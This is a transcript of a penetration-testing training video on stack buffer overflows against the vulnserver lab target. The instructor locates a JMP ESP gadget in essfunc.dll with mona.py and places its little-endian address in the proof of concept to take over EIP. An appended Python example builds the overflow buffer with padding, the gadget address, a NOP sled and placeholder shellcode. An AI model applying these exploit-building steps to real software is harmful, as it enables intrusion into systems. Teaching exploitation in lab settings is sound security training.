Time
14 hours 43 minutes
Difficulty
Advanced
CEU/CPE
15

Video Transcription

00:00
Hello, everybody, and welcome to episode number 32 of the buffer overflow series: redirecting execution.
00:08
My name is Alejandro Guinea and I'll be the instructor for today's session.
00:12
The learning objectives of the session are to understand the concepts behind the buffer overflow attack and apply the techniques to implement a buffer overflow attack.
00:21
So let's get down to business, shall we?
00:25
First, again, let me remind you what mona.py is: it's just a plugin for Immunity Debugger, so it can help us find out more about the memory where we're executing our payload or exploit.
00:41
In this case, in this scenario, it will help us
00:46
find out what modules are loaded when we crash the application. We can actually jump to that other module, or address. So let me just
00:57
show you how to do that. First, let me grab this out. And remember that in this case we already have something crashed, so let me just crash it again,
01:11
because we want to find out something that was being loaded at the crash time.
01:23
Okay, now that we have loaded that, yes,
01:30
let me just
01:34
modify my
01:37
script. I don't want to send bad characters anymore. I will just leave that commented, so we can know how we have been progressing in all of this.
01:48
So again,
02:09
we crashed our application.
02:13
And now I want to find out which modules are loaded in memory when the application was crashed,
02:21
so I just stop here at the bottom of the window screen right here:
02:28
!mona modules.
02:30
And that's it. I think that's certain. I entered that and I can see a lot of modules being loaded, all these modules, more precisely.
02:38
Now, the point right now is to remember a couple of things.
02:45
Remember that I told you that the range of the memory must not contain bad characters. We identified in the previous video, you remember, that the bad character affecting the execution flow was the 00 character, which is, you know, the representation of the null character.
03:02
So that's one criterion. And the other criterion is to have some addresses that don't contain memory protection,
03:12
like, for example, ASLR, address space layout randomization. Again, ASLR. Yeah, you cannot
03:23
find these modules sometimes, and you will have to implement techniques to bypass such protections. But this is beyond this course, because this will...
03:36
this is beyond this course, which is creating a buffer overflow, but there are techniques that you can use to actually bypass the address space layout randomization protection or any other protection. So for this case, these two addresses look good to me. For example, all of them have False, False,
03:54
as you can see, for example, False,
03:58
and False again. So yeah, let's grab this one.
04:08
Okay.
04:10
You could, you know,
04:12
use any other memory address, but let's just use the first one, which is just a DLL which is, by the way, being loaded from the vulnserver application. So we need now... Now that we know what...
04:31
remember the name: essfunc
04:34
.dll. Remember that name. Now that we know that name, we need to find a JMP ESP instruction so we can reach this module by JMP ESP. I mean, we already are in the vulnserver.exe module, or stack, I'm sorry.
04:53
And we now know the location, so we need to tell that EIP
05:00
to jump to the top of the stack of this DLL,
05:04
if that makes sense, but yeah, that's what we need to tell it. So we need to find a JMP ESP instruction so we can tell it to go to the top of that essfunc.dll.
05:18
For that I go to the Executable Modules list. Let me just
05:23
click on that,
05:25
and you can see that there's this essfunc in there. I just double-click on it, and I'm in that module. That module is loaded; that's the point.
05:38
Here you can see that on the top of Immunity Debugger. Now I need to again find
05:46
JMP ESP. So I just go here, right-click, Search for > Command, for example.
05:53
I put "jmp esp", which is already in there. Remember, JMP ESP. I type Find and it gave me this address. Now this is really important because I need to
06:05
put that specific address in my EIP. In the rare case that you don't find a JMP ESP, you can still go to Search for > Sequence of commands and just type...
06:24
Let me just stop it here.
06:28
PUSH
06:29
ESP
06:30
and then RETN
06:33
and Find.
06:35
And no, it did not find any, so that's OK. We already found our JMP ESP in that application. If you don't find anything in that module, or, you know, in that region, you can always go to all modules, "M", at the top.
06:55
Here you can find essfunc, and you can see that only one of them is marked as executable, which is that one region. But you know,
07:10
you can try to use that address. Remember that we selected the address without memory protection for the essfunc process; we're free to use an instruction from any section of this module, and not only the ones marked as executable.
07:27
So you can tell mona to look for the JMP ESP instruction in the entire region
07:32
by passing this command. Well, first, let's find out what the hex equivalent of a JMP ESP instruction is. Let me just check this out,
07:48
and we can actually tell it to... Let me just locate nasm_shell, another
07:57
Ruby script
07:59
of the Metasploit framework.
08:01
Let me just copy that
08:07
and just
08:09
run it and pass it the instruction, jmp esp,
08:16
and it will tell us the instruction is FFE4. Okay, that's fine:
08:20
FFE4. So I go back to my Immunity Debugger with the mona
08:28
Python script, and I tell it to go find, from... yes:
08:33
!mona find -s,
08:39
which is, by the way, for string, and
08:43
"\xff
08:45
\xe4", which is basically "find a JMP ESP". And I want to find it in all the modules, or in a specific module, -m.
08:56
Remember the name of the module, which is...
09:00
What was the name of the module?
09:09
Oh, yeah,
09:11
it's...
09:13
wasn't it esse...
09:16
easy...
09:18
it's essfunc.dll.
09:24
So we type that and we find a total of nine pointers,
09:28
which is good. My point is that that's good. In fact, if you take a look at the first one that came from that command, it's actually the one we're using, or the one we selected at the beginning: 625011AF.
09:48
Right, that's different. We can actually use any of these as long as they don't contain any bad characters, which... it seems they don't; they don't contain 00. And they all are JMP ESP, remember, FFE4. So we're good in that matter.
10:07
Ah,
10:09
but let's stick with the first one, which was this one specifically, the one that's marked right now. So let's just double-check. Let's just
10:20
execute this, and you can see that it's already in there, 625011AF, just to see if it actually goes to a JMP ESP. And in fact, it goes to a JMP ESP. So we're good in that matter. I mean, we're just double-checking that.
10:37
So now that we know that this actually contains a JMP ESP, let me just
10:43
put that
10:43
in the CPU view.
10:46
Let me just close it out anyway. We have to
10:48
restore the service. Now that we know
10:52
what address we need to use, we can actually change... sorry,
10:58
we can actually change our proof of concept.
11:03
So instead of those four Bs, because those were the four Bs we were overwriting...
11:11
We were overwriting the EIP. So we now need to put that. So remember that
11:18
we need to put it in reverse, as the 32-bit architecture stores addresses in memory in the little-endian format. So yeah,
11:30
this "\xaf",
11:31
you know, the very end of the string, "\x11",
11:37
"\x50",
11:41
and "\x62". And we have our address right now.
11:46
Now the execution flow will not go to a non-existent address like the four Bs we were sending before, 42424242; it will go to a real address with a JMP ESP, allowing us to execute our shellcode.
12:03
So basically, we're telling the stack of the program: "Okay, you know what, don't continue
12:09
with the next stack, executing whatever was to be executed next. Actually, go to this other location where we have a JMP ESP." We have the entire stack for ourselves and we'd like to actually execute this payload.
12:28
Now, what payload are we going to execute?
12:33
That's the one we're going to create next in our upcoming videos.
12:39
Let me just save this one.
12:46
What is executed by the mona modules command? Well, it will show us all the modules that are loaded in memory when we crashed the application. This will help us see if we have another module that we can jump to,
13:01
or other stacks we can jump to, and, you know, find out,
13:05
see if we can actually use one of them to execute our payload.
13:11
What is executed by the mona script when we pass the -s flag? It will search for a specific string in a specific module, if we tell it so. In this video we searched for a JMP ESP string
13:28
in a specific module, which was essfunc
13:33
.dll. So yeah, that's what you can achieve by passing that flag.
13:37
In this video, we learned some concepts behind the buffer overflow attack, and we implemented some techniques to execute the buffer overflow attack. Supplemental materials: again, The Hacker Playbook, again an amazing book, and, you know, stay with the Capture the Flag 101, guys.
13:56
In the next video, we'll see how to create an executable, or payload, so we can actually go from controlling the EIP to telling the EIP to jump to another ESP, and from that ESP, which is the top of the stack, execute our payload.
14:13
So that's it for today, folks. I hope you enjoyed the video, and talk to you soon.
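Editor's added example (not code from the video, from mona, or from the instructor's own proof of concept): the steps walked through above, in Python. It searches a module image for the JMP ESP opcodes (FF E4) and the PUSH ESP; RET fallback (54 C3), discards candidate addresses whose little-endian bytes contain the bad character 00, and builds the overwrite buffer with the chosen address in EIP's place. The module image is constructed inline: the base address 0x62500000, the planted offsets, the filler bytes, the example offset 2003 and the `nop_sled` parameter are all assumptions chosen so that one hit lands at 0x625011AF, the address used in the video; the function names are hypothetical.

```python
import struct

# Constructed sample data (not taken from the video): a stand-in for the bytes
# of a loaded module, with a few gadgets planted at chosen offsets. The base
# address and the offsets are assumptions picked so that one JMP ESP lands at
# 0x625011AF, the address selected in the video.
MODULE_BASE = 0x62500000
BADCHARS = b"\x00"   # the only bad character identified in the earlier video

GADGETS = {
    "jmp esp": b"\xff\xe4",        # FF E4, what nasm_shell prints for "jmp esp"
    "push esp; ret": b"\x54\xc3",  # 54 C3, the fallback sequence searched for
}


def build_module_image():
    """Return the constructed module image: int3 filler with three gadgets planted."""
    image = bytearray(b"\xcc" * 0x2000)
    image[0x11AF:0x11B1] = GADGETS["jmp esp"]        # -> 0x625011AF, usable
    image[0x1200:0x1202] = GADGETS["jmp esp"]        # -> 0x62501200, packs with a 0x00
    image[0x1338:0x133A] = GADGETS["push esp; ret"]  # -> 0x62501338, usable fallback
    return bytes(image)


def find_gadgets(image, base, gadgets=GADGETS):
    """Every occurrence of each gadget's opcode bytes as (address, name), sorted.

    Same idea as `!mona find -s "\\xff\\xe4" -m essfunc.dll`: a raw byte search
    over the whole image, not only executable sections, which is what the video
    relies on for a module without memory protections.
    """
    hits = []
    for name, pattern in gadgets.items():
        pos = image.find(pattern)
        while pos != -1:
            hits.append((base + pos, name))
            pos = image.find(pattern, pos + 1)
    return sorted(hits)


def little_endian(addr):
    """Pack a 32-bit address the way x86 stores it in memory: lowest byte first."""
    return struct.pack("<I", addr)


def has_bad_chars(addr, badchars=BADCHARS):
    """True if any byte of the packed address is a bad character."""
    return any(b in badchars for b in little_endian(addr))


def usable_gadgets(image, base, badchars=BADCHARS):
    """Gadget addresses whose packed form is free of bad characters."""
    return [(addr, name) for addr, name in find_gadgets(image, base)
            if not has_bad_chars(addr, badchars)]


def build_payload(offset, jmp_addr, shellcode, nop_sled=16, badchars=BADCHARS):
    """Padding up to the saved return address, the packed gadget address in EIP's
    place, a NOP sled, then the shellcode that JMP ESP lands on.

    `offset` is the distance to EIP found with the pattern-offset step of the
    earlier videos; it is supplied by the caller, not derived here.
    """
    if has_bad_chars(jmp_addr, badchars):
        raise ValueError("gadget address %#x contains a bad character" % jmp_addr)
    if any(b in badchars for b in shellcode):
        raise ValueError("shellcode contains a bad character; re-encode it")
    return b"A" * offset + little_endian(jmp_addr) + b"\x90" * nop_sled + shellcode


if __name__ == "__main__":
    image = build_module_image()
    for addr, name in find_gadgets(image, MODULE_BASE):
        flag = "BAD CHARS" if has_bad_chars(addr) else "ok"
        print("%#010x  %-14s %s" % (addr, name, flag))
    addr, _ = usable_gadgets(image, MODULE_BASE)[0]        # 0x625011AF
    # 2003 is an assumed example offset, not a value taken from this video.
    poc = build_payload(2003, addr, b"\xcc" * 4)
    print("EIP bytes on the wire:", little_endian(addr).hex())
```

Running it lists the three planted hits, marks 0x62501200 as unusable because its lowest byte is 00, and shows the EIP bytes af115062, the reversed form of 625011AF that the video types into the proof of concept. The search deliberately covers the whole image rather than only sections marked executable; that is safe only when the module has no protections such as DEP or ASLR, which is why the modules listing with its False columns is checked first.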

Up Next

Offensive Penetration Testing

This is a deep course about penetration testing. In this course, you’ll learn from basic to the most advanced and modern techniques to find vulnerabilities through information gathering, create and/or use exploits and be able to escalate privileges in order to test your information systems defenses.

Instructed By

Alejandro Guinea
CERT Regional Director
Instructor